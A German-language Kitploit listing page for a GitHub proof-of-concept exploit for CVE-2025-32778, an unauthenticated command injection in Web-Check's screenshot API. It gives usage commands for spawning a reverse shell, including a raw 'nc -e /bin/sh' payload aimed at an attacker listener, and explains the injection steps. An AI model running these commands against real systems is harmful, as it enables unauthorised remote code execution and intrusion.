Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32778 — PoC-Exploit für CVE-2025-32778: Befehlsinjektion im OSINT-Tool Web-Check | Kitploit
Tools/GitHubGitHub/00xcanelo/cve-2025-32778
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHub00xcanelo/cve-2025-32778

CVE-2025-32778

PoC-Exploit für CVE-2025-32778: Befehlsinjektion im OSINT-Tool Web-Check

Repository anzeigen
3149vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-32778 - Web-Check Befehlseinschleusungs-Exploit

Critical Language: Python

Beschreibung

CVE-2025-32778 ist eine kritische Sicherheitslücke zur Befehlseinschleusung im Web-Check OSINT-Tool von Lissy93.
Sie ermöglicht nicht authentifizierten Angreifern, über den url-Parameter in der Screenshot-API beliebige Systembefehle auszuführen.

Dieses Python-Skript automatisiert die Ausnutzung und kann Reverse Shells erzeugen oder benutzerdefinierte Shell-Payloads akzeptieren.


Warnung

  • Testen Sie nur auf Systemen, die Ihnen gehören oder für die Sie autorisiert sind.
  • Unautorisierte Nutzung ist illegal und unethisch.

Funktionen

  • Nutzt die url-Befehlseinschleusung in Web-Check aus.
  • Unterstützt:
    • Reverse Shell mit --lhost und --lport.
    • Benutzerdefinierte Shell über --shell.
  • URL-Normalisierung.
  • Verhindert die Kombination von --shell mit --lhost/--lport.

  • Voraussetzungen

    • Python 3.x
    • Requests-Bibliothek:
    root@kitploit:~
    pip install requests
    

    Verwendung

    root@kitploit:~
    git clone https://github.com/00xCanelo/CVE-2025-32778
    cd CVE-2025-32778
    

    Reverse Shell mit dem Tool erzeugen

    root@kitploit:~
    python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444
    

    Benutzerdefiniertes Shell-Payload (Raw)

    root@kitploit:~
    python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"
    

    Hilfemenü

    root@kitploit:~
    python3 cve-2025-32778.py -h
    

    So funktioniert es

    1. Normalisieren Sie die Ziel-URL zu scheme://host[:port].

    2. Bereiten Sie das Payload vor:

      • Erzeugen Sie eine Reverse Shell mit --lhost und --lport.
      • Oder verwenden Sie einen rohen Shell-Befehl mit --shell.
    3. Kodieren Sie das Shell-Payload für die sichere URL-Einschleusung.

    4. Senden Sie eine HTTP-GET-Anfrage an /api/screenshot/ mit dem Payload.

    5. Warten Sie auf die Reverse-Shell-Verbindung.


    🧑‍💻 Autor

    00xCanelo
    GitHub Profile


    Referenzen

    • Web-Check GitHub Repository – Ursprüngliches Projekt mit dem verwundbaren Code.
    • CVE-2025-32778 – CVE-Eintrag, der die Befehlseinschleusungssicherheitslücke beschreibt.
    Tool herunterladen